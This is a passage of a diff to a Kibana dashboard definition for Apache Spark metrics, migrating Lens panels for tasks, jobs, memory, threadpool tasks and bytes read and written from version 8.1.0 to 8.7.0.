+ "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "787550e5-b4cd-4892-babc-4f3d33c078ec", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "df39527d-9339-47cb-9833-2e3d3ccc9c30": { + "columnOrder": [ + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "columns": { + 
"02d81198-17ac-4861-870d-c481ba9a7dad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.completed" + }, + "16d7f486-58c7-46a1-96ea-d2be88b82633": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Skipped", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.skipped" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.failed" + }, + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "787550e5-b4cd-4892-babc-4f3d33c078ec", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } + } + ], + "query": { + "language": "kuery", + "query": "apache_spark.driver.tasks.failed : * or apache_spark.driver.tasks.skipped : * or apache_spark.driver.tasks.completed : * " + }, + "visualization": { + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + 
"02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "yConfig": [ + { + "axisMode": "left", + "color": "#d36086", + "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" + }, + { + "axisMode": "left", + "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" + }, + { + "axisMode": "left", + "color": "#54b399", + "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "legendSize": "auto" }, - "gridData": { - "h": 6, - "i": "64cbf207-795a-4818-915c-137eaebc6198", - "w": 8, - "x": 0, - "y": 17 + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "64cbf207-795a-4818-915c-137eaebc6198", - "title": "Maximum amount of memory available for storage [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Tasks" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "509e9888-4307-45b6-9c04-5b7feafeef87", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "df5be9fa-fb96-4da2-a042-71b37b7c3275", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "483b85ff-1b76-41d9-926b-25f70122ef28": { - "columnOrder": [ - "6ecaa697-7840-4a3c-a949-687d66bd9cdd" - ], - "columns": { - "6ecaa697-7840-4a3c-a949-687d66bd9cdd": { - "customLabel": true, - "dataType": 
"number", - "isBucketed": false, - "label": "Failed Jobs", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.jobs.failed" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "509e9888-4307-45b6-9c04-5b7feafeef87", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "df5be9fa-fb96-4da2-a042-71b37b7c3275", - "key": "apache_spark.driver.jobs.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.jobs.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "6ecaa697-7840-4a3c-a949-687d66bd9cdd", - "layerId": "483b85ff-1b76-41d9-926b-25f70122ef28", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of Tasks over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "64cbf207-795a-4818-915c-137eaebc6198", + "w": 8, + "x": 0, + "y": 17 + }, + "panelIndex": "64cbf207-795a-4818-915c-137eaebc6198", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "type": "index-pattern" + }, + { + "id": 
"metrics-*", + "name": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "efa9fcdd-f421-4c27-a85b-3a6d2512a09d": { + "columnOrder": [ + "6962059b-392d-416f-a321-b0de80b841a7" + ], + "columns": { + "6962059b-392d-416f-a321-b0de80b841a7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Memory (MB)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.memory.max_mem" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "62c6f93e-b6c1-4004-b780-535ed730ebaa", - "w": 8, - "x": 8, - "y": 17 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "62c6f93e-b6c1-4004-b780-535ed730ebaa", - "title": "Number of jobs failed [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "key": "apache_spark.driver.memory.max_mem", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.memory.max_mem" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "6962059b-392d-416f-a321-b0de80b841a7", + "layerId": "efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "layerType": 
"data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3fe0b162-ec79-4815-895a-79ac382ca1d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62857a2d-669f-4c70-9f92-dcab405c9f9a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "aec1fa6a-6818-41f0-862a-8c7feed2ea3e": { - "columnOrder": [ - "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a" - ], - "columns": { - "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Succeeded Jobs", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.jobs.succeeded" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3fe0b162-ec79-4815-895a-79ac382ca1d7", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "62857a2d-669f-4c70-9f92-dcab405c9f9a", - "key": "apache_spark.driver.jobs.succeeded", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.jobs.succeeded" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": 
"f69b66b5-f920-44c1-9b5a-0f6076ac9f6a", - "layerId": "aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Maximum amount of memory available for storage [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "62c6f93e-b6c1-4004-b780-535ed730ebaa", + "w": 8, + "x": 8, + "y": 17 + }, + "panelIndex": "62c6f93e-b6c1-4004-b780-535ed730ebaa", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "509e9888-4307-45b6-9c04-5b7feafeef87", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "df5be9fa-fb96-4da2-a042-71b37b7c3275", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "483b85ff-1b76-41d9-926b-25f70122ef28": { + "columnOrder": [ + "6ecaa697-7840-4a3c-a949-687d66bd9cdd" + ], + "columns": { + "6ecaa697-7840-4a3c-a949-687d66bd9cdd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed Jobs", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.jobs.failed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "509e9888-4307-45b6-9c04-5b7feafeef87", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": 
{}, - "hidePanelTitles": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "gridData": { - "h": 6, - "i": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", - "w": 8, - "x": 16, - "y": 17 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "df5be9fa-fb96-4da2-a042-71b37b7c3275", + "key": "apache_spark.driver.jobs.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.jobs.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "6ecaa697-7840-4a3c-a949-687d66bd9cdd", + "layerId": "483b85ff-1b76-41d9-926b-25f70122ef28", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of jobs failed [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", + "w": 8, + "x": 16, + "y": 17 + }, + "panelIndex": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3fe0b162-ec79-4815-895a-79ac382ca1d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62857a2d-669f-4c70-9f92-dcab405c9f9a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aec1fa6a-6818-41f0-862a-8c7feed2ea3e": { + "columnOrder": [ + "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a" + ], + 
"columns": { + "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Succeeded Jobs", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.jobs.succeeded" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3fe0b162-ec79-4815-895a-79ac382ca1d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", - "title": "Number of Succeeded jobs [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "62857a2d-669f-4c70-9f92-dcab405c9f9a", + "key": "apache_spark.driver.jobs.succeeded", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.jobs.succeeded" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a", + "layerId": "aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1215080a-2795-41e4-a618-d54b0e020cbc", - "type": "index-pattern" - } - ], - "state": { - 
"datasourceStates": { - "indexpattern": { - "layers": { - "df39527d-9339-47cb-9833-2e3d3ccc9c30": { - "columnOrder": [ - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "columns": { - "02d81198-17ac-4861-870d-c481ba9a7dad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Started", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.started_tasks" - }, - "16d7f486-58c7-46a1-96ea-d2be88b82633": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.active_tasks" - }, - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Completed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.complete_tasks" - }, - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1215080a-2795-41e4-a618-d54b0e020cbc", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - } - ], - "query": { - "language": "kuery", - "query": "apache_spark.executor.threadpool.complete_tasks : * or apache_spark.executor.threadpool.active_tasks : * or apache_spark.executor.threadpool.started_tasks : * " - }, - "visualization": { - 
"fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "yConfig": [ - { - "axisMode": "left", - "color": "#54b399", - "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" - }, - { - "axisMode": "left", - "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" - }, - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Threadpool Tasks" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Succeeded jobs [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "b5caa5d1-221e-400d-a11a-ea539f1f4546", + "w": 26, + "x": 0, + "y": 23 + }, + "panelIndex": "b5caa5d1-221e-400d-a11a-ea539f1f4546", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1215080a-2795-41e4-a618-d54b0e020cbc", + "type": "index-pattern" + } + ], + "state": { + 
"datasourceStates": { + "formBased": { + "layers": { + "df39527d-9339-47cb-9833-2e3d3ccc9c30": { + "columnOrder": [ + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "columns": { + "02d81198-17ac-4861-870d-c481ba9a7dad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Started", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.started_tasks" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "16d7f486-58c7-46a1-96ea-d2be88b82633": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.active_tasks" + }, + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.complete_tasks" + }, + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1215080a-2795-41e4-a618-d54b0e020cbc", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } + } + ], + "query": { + "language": "kuery", + "query": "apache_spark.executor.threadpool.complete_tasks : * or 
apache_spark.executor.threadpool.active_tasks : * or apache_spark.executor.threadpool.started_tasks : * " + }, + "visualization": { + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "b5caa5d1-221e-400d-a11a-ea539f1f4546", - "w": 26, - "x": 0, - "y": 23 + "layers": [ + { + "accessors": [ + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "yConfig": [ + { + "axisMode": "left", + "color": "#54b399", + "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" + }, + { + "axisMode": "left", + "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" + }, + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "legendSize": "auto" }, - "panelIndex": "b5caa5d1-221e-400d-a11a-ea539f1f4546", - "title": "Number of Threadpool tasks over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 5, - "i": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "w": 8, - "x": 26, - "y": 23 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "panelRefName": "panel_7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "type": "lens", - "version": "8.1.0" + "yTitle": "Threadpool Tasks" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - 
"gridData": { - "h": 5, - "i": "0595e44f-e6b0-4d93-868f-040f2eb0de31", - "w": 7, - "x": 34, - "y": 23 - }, - "panelIndex": "0595e44f-e6b0-4d93-868f-040f2eb0de31", - "panelRefName": "panel_0595e44f-e6b0-4d93-868f-040f2eb0de31", - "type": "lens", - "version": "8.1.0" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of Threadpool tasks over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", + "w": 8, + "x": 26, + "y": 23 + }, + "panelIndex": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3a277aff-7c7b-443b-bccf-271cb4486f72": { + "columnOrder": [ + "08a11063-090b-4210-a4e4-30189048b7aa" + ], + "columns": { + "08a11063-090b-4210-a4e4-30189048b7aa": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.bytes.read" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "key": "apache_spark.executor.bytes.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.bytes.read" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "08a11063-090b-4210-a4e4-30189048b7aa", + "layerId": "3a277aff-7c7b-443b-bccf-271cb4486f72", + "layerType": 
"data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "171181c8-0b9a-4664-85cb-0e8b82132b7a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6ffc819a-ab7a-43bd-aa18-dbd327428425", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "d4698267-4169-47b1-81cd-17bd8621879f": { - "columnOrder": [ - "f718a530-bd5f-4e8e-8960-ffac1ce48483" - ], - "columns": { - "f718a530-bd5f-4e8e-8960-ffac1ce48483": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Waiting Applications", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.applications.waiting" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "171181c8-0b9a-4664-85cb-0e8b82132b7a", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6ffc819a-ab7a-43bd-aa18-dbd327428425", - "key": "apache_spark.node.main.applications.waiting", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.applications.waiting" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": 
"f718a530-bd5f-4e8e-8960-ffac1ce48483", - "layerId": "d4698267-4169-47b1-81cd-17bd8621879f", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "Number of Bytes Read [Metrics Apache Spark]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "type": "index-pattern" + } + ] + }, + "type": "lens" + } + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "0595e44f-e6b0-4d93-868f-040f2eb0de31", + "w": 7, + "x": 34, + "y": 23 + }, + "panelIndex": "0595e44f-e6b0-4d93-868f-040f2eb0de31", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5d66805e-b15a-4a65-b914-128afac75b09": { + "columnOrder": [ + "55aa8a79-a965-4ad3-bd75-1182fc29570e" + ], + "columns": { + "55aa8a79-a965-4ad3-bd75-1182fc29570e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Written", + 